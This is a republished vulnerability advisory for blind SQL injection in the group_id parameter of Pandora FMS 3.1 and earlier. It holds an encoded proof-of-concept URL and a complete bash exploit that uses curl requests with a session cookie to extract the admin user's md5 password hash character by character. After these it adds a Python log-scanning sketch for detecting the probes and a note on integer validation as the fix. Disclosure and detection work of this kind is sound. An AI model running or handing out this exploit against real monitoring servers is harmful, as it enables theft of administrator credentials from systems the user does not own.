
Pandora FMS <= 3.1 Blind SQL Injection Vulnerability

10-12-02

The group_id parameter of operation/agentes/estado_agente.php is vulnerable to blind SQL injection.


PoC:

http://host/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=24%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=49%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281

 


Exploit:


#!/bin/bash
# Pandora Flexible Monitoring System Blind SQL Injection PoC
# Juan Galiana Lara
# Gets the md5 hash password from a specific user
#
# configure host, cookie & group_id before using it
# usage
# $ ./getpassword.sh
# 74b444ff2785ea8bb9ae02c13b6a71f1

HOST="HOST"
TARGET_USER="0x61646d696e" # admin
PATTERN="Interval"
COOKIE="rq842tci6e5ib7t918c6sv1ml4"
CHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v w x y z)
GROUP_ID=2

# Outer loop: one iteration per character of the 32-character md5 hash
j=1
while [[ $j -lt 33 ]]; do
    i=0
    # Inner loop: try each candidate character at position $j
    while [[ $i -lt ${#CHARSET[@]} ]]; do
        # Character code of the candidate, compared against ord(substring(...))
        c=$(printf '%d' "'${CHARSET[$i]}")
        URL="http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281"
        # The page contains $PATTERN only when the injected condition is true
        curl "$URL" --cookie "PHPSESSID=$COOKIE" 2> /dev/null | grep -q "$PATTERN"
        if [ $? -eq 0 ]; then echo -n "${CHARSET[$i]}"; break; fi
        let i++
    done
    if [[ $i -eq ${#CHARSET[@]} ]]; then echo "Something went wrong!"; exit 1; fi
    let j++
done
echo
exit 0
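The traffic this script generates is easy to spot in web server logs: a legitimate group_id is a plain integer, and the script sends a long run of requests whose group_id carries a substring() probe at successive positions. The following detection sketch is an added example, not part of the original advisory. It assumes combined-format access logs; the function names, the threshold and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

TARGET_SEC2 = "operation/agentes/estado_agente"
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
PROBE_RE = re.compile(r"substring\(\s*\w+\s*,\s*(\d+)\s*,\s*1\s*\)", re.I)

def make_line(ip, group_id):
    """Build one constructed log line in combined log format."""
    return (f'{ip} - - [02/Dec/2010:10:00:00 +0000] "GET /pandora_console/index.php'
            f'?sec=estado&sec2={TARGET_SEC2}&group_id={group_id} HTTP/1.1" 200 4096')

# Constructed sample: one normal request, then probes shaped like the page's PoC
# (abbreviated; documentation-range IP addresses).
PROBE = ("2%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28"
         "substring%28password,{pos},1%29%29={code}%20and%20id_user=0x61646d696e%29")
SAMPLE_LOG = [make_line("192.0.2.10", "2")] + [
    make_line("198.51.100.7", PROBE.format(pos=p, code=c))
    for p in (1, 2, 3) for c in (48, 49)
]

def bad_group_id(line):
    """Return (client, decoded group_id) when group_id is not a plain integer."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    query = parse_qs(urlsplit(target).query)  # percent-decodes the values
    if TARGET_SEC2 not in query.get("sec2", []):
        return None
    for value in query.get("group_id", []):
        if not re.fullmatch(r"[0-9]+", value):
            return client, value
    return None

def scan(lines, min_requests=5):
    """Per client: count of non-integer group_id requests and positions probed."""
    hits = defaultdict(lambda: {"requests": 0, "positions": set()})
    for line in lines:
        found = bad_group_id(line)
        if found:
            client, value = found
            hits[client]["requests"] += 1
            hits[client]["positions"].update(int(p) for p in PROBE_RE.findall(value))
    # Keep only clients with enough hits to look like character-by-character extraction
    return {c: h for c, h in hits.items() if h["requests"] >= min_requests}
```

The same integer-only rule that drives the detection is the server-side fix: casting or validating group_id as an integer before it reaches the query removes the injection point.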

 


Copyright: 红黑联盟, a site dedicated to practical IT technology learning